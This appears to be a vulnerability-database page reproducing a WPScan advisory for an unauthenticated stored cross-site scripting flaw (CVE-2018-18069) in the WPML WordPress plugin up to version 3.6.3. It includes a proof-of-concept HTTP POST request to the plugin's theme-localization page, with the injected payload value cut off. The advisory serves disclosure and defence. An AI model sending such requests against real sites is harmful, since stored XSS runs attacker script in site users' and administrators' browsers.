Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:024B43D3-1E73-47F1-81D2-AB15A6C7B0FD
HistoryOct 08, 2018 - 12:00 a.m.

WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)

2018-10-0800:00:00
wpscan.com
12

EPSS

0.001

Percentile

40.5%

JSON

The sitepress-multilingual-cms WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) security vulnerability.

PoC

POST /wp-admin/admin.php?page=sitepress-multilingual-cms-3.6.3%2Fmenu%2Ftheme-localization.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 90 Cookie: wordpress_test_cookie=WP+Cookie+check Connection: close Upgrade-Insecure-Requests: 1 icl_post_action=save_theme_localization&locale;_file_name_en=">

Related

nuclei 1
prion 1
cve 1
wpexploit 1
cvelist 1
nvd 1
nuclei
nuclei
WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting
2020-05-14 17:54:02
prion
prion
Design/Logic Flaw
2018-10-08 22:29:00
cve
cve
CVE-2018-18069
2018-10-08 22:29:00
wpexploit
wpexploit
WPML <= 3.6.3 - Unauthenticated Stored Cross-Site Scripting (XSS)
2018-10-08 00:00:00
cvelist
cvelist
CVE-2018-18069
2018-10-08 22:00:00
nvd
nvd
CVE-2018-18069
2018-10-08 22:29:00

EPSS

0.001

Percentile

40.5%

JSON
Related for WPVDB-ID:024B43D3-1E73-47F1-81D2-AB15A6C7B0FD
nuclei1prion1cve1wpexploit1cvelist1nvd1